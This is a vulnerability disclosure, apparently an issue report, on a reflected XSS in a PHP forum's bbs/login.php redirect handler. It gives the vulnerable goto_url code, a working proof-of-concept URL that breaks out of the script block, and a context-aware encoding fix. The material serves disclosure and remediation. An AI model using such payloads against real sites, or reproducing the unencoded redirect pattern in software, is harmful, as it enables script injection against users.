# Limited reflected XSS in bbs/login.php
In bbs/login.php, only single quotes and double quotes in the `$url` parameter are escaped.
In the function `check_url_host`, if the URL does not start with http or https, the url parameter is treated as a path and passes without any filter.
The value then reaches the function `goto_url`:
```
function goto_url($url)
{
    // Undo HTML-encoded ampersands in the query string
    $url = str_replace("&amp;", "&", $url);
    //echo "<script> location.replace('$url'); </script>";
    if (!headers_sent())
        header('Location: '.$url);
    else {
        // Fallback when headers were already sent: $url is written into the page without encoding
        echo '<script>';
        echo 'location.replace("'.$url.'");';
        echo '</script>';
        echo '<noscript>';
        echo '<meta http-equiv="refresh" content="0;url='.$url.'" />';
        echo '</noscript>';
    }
    exit;
}
```
When `headers_sent()` returns true, the url parameter is spliced directly into JavaScript.
Although we can't use double quotes, we can break out of the script block directly with `</script>`:
```
/bbs/login.php?url=www.baidu.com</script><script>alert(1)</script>
```
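The fallback branch writes `$url` into two different contexts (a JavaScript string and an HTML attribute), so each needs its own encoding. The following is an added example of that fix, not the project's code or its actual patch; `js_string_literal`, `build_redirect_fallback` and `safe_goto_url` are hypothetical names, and it covers output encoding only, not the URL checks in `check_url_host`.

```php
<?php
// Added example (hypothetical function names): context-aware encoding for the
// fallback branch of goto_url().

// Encode a value as a JavaScript string literal that is safe inside an inline
// <script> block. JSON_HEX_TAG emits "<" and ">" as \u003C and \u003E, so a
// "</script>" in the value can no longer terminate the block.
function js_string_literal(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        | JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE
    );
}

// Build the markup that is used when headers have already been sent.
function build_redirect_fallback(string $url): string
{
    // JavaScript string context: json_encode() adds the surrounding quotes.
    $js = js_string_literal($url);
    // HTML attribute context: encode quotes, angle brackets and ampersands.
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<script>location.replace(' . $js . ');</script>'
         . '<noscript><meta http-equiv="refresh" content="0;url=' . $attr . '" /></noscript>';
}

function safe_goto_url(string $url): void
{
    $url = str_replace('&amp;', '&', $url);
    // Remove control characters (CR, LF, NUL, ...) before the value reaches a header.
    $url = preg_replace('/[\x00-\x1F\x7F]/', '', $url);

    if (!headers_sent()) {
        header('Location: ' . $url);
    } else {
        echo build_redirect_fallback($url);
    }
    exit;
}

// Constructed sample input: the value from the request shown above.
$sample = 'www.baidu.com</script><script>alert(1)</script>';
echo build_redirect_fallback($sample), PHP_EOL;
```

In the printed markup the only `</script>` is the one the function itself emits; the copies inside the value appear as `\u003C/script\u003E` in the script block and as `&lt;/script&gt;` in the `content` attribute.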